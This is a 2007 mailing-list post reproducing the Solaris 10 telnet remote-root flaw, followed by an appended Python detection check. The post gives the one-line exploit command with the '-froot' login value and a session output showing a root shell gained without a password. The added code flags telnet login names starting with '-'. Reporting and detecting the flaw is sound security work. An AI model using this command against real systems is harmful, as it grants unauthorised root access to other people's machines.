[geeks] Solaris 10 Remote-Root Exploit
Doug McLaren
dougmc at frenzied.us
Mon Feb 12 11:43:48 CST 2007
On Mon, Feb 12, 2007 at 11:21:13AM -0600, Lionel Peterson wrote:
| Just a few datapoints - anyone recreate this yet?
Yes.
% telnet -l"-froot" sunspot
Trying 10.18.80.89...
Connected to sunspot.
Escape character is '^]'.
Last login: Fri Feb 9 14:37:41 from lenny.vignette.
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
==============================================================
Oracle 10.2.0.1.0
...
#
It also worked on different accounts as well.
Now, this box does allow telnets in as root (intentionally, as it's a
sandbox type box) so maybe that's relevant. It's probably not
anywhere near up to date on patches either.
(It also seems to work OK when done with a `telnet -l -froot sunspot',
for another data point.)
--
Doug McLaren, dougmc at frenzied.us
Kill -9 'em all, let root at localhost sort 'em out.
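
Added example, not part of the original message: a detection check that parses captured client-to-server telnet bytes and flags any login name starting with "-", such as the "-froot" value used in the session above. It assumes the client passes the -l argument as the USER variable in a NEW-ENVIRON subnegotiation (RFC 1572) and that no legitimate account name begins with "-"; the function names and the sample bytes are constructed for illustration.

```python
# Telnet constants from RFC 854 and RFC 1572 (NEW-ENVIRON).
IAC, SB, SE, WILL = 255, 250, 240, 251
NEW_ENVIRON, IS, INFO = 39, 0, 2
VAR, VALUE, ESC, USERVAR = 0, 1, 2, 3

def subnegotiations(stream):
    """Yield (option, payload) for every complete IAC SB ... IAC SE block."""
    i = 0
    while i < len(stream) - 2:
        if stream[i] == IAC and stream[i + 1] == SB:
            option, payload, j = stream[i + 2], bytearray(), i + 3
            while j < len(stream) - 1:
                if stream[j] == IAC and stream[j + 1] == SE:
                    yield option, bytes(payload)
                    break
                if stream[j] == IAC and stream[j + 1] == IAC:
                    j += 1                      # doubled IAC is a literal 0xFF
                payload.append(stream[j])
                j += 1
            i = j + 2
        else:
            i += 2 if stream[i] == IAC and stream[i + 1] == IAC else 1

def environ_vars(payload):
    """Parse a NEW-ENVIRON IS/INFO payload into {name: value}."""
    if not payload or payload[0] not in (IS, INFO):
        return {}
    pairs, field, k = [], 0, 1
    while k < len(payload):
        b = payload[k]
        if b in (VAR, USERVAR):
            pairs.append([bytearray(), bytearray()])
            field = 0
        elif b == VALUE and pairs:
            field = 1
        elif pairs:
            if b == ESC and k + 1 < len(payload):
                k += 1                          # ESC: next byte is literal
            pairs[-1][field].append(payload[k])
        k += 1
    return {bytes(n).decode("latin-1"): bytes(v).decode("latin-1") for n, v in pairs}

def flagged_users(stream):
    """Return USER values that begin with '-' (they look like an option, not a name)."""
    users = (environ_vars(p).get("USER") for o, p in subnegotiations(stream) if o == NEW_ENVIRON)
    return [u for u in users if u and u.startswith("-")]

def sample(user):  # constructed client bytes: IAC WILL NEW-ENVIRON, then USER=<user>
    return (bytes([IAC, WILL, NEW_ENVIRON, IAC, SB, NEW_ENVIRON, IS, VAR]) + b"USER"
            + bytes([VALUE]) + user.encode() + bytes([IAC, SE]))
```

flagged_users(sample("-froot")) returns ["-froot"], while an ordinary name such as "oracle" returns an empty list.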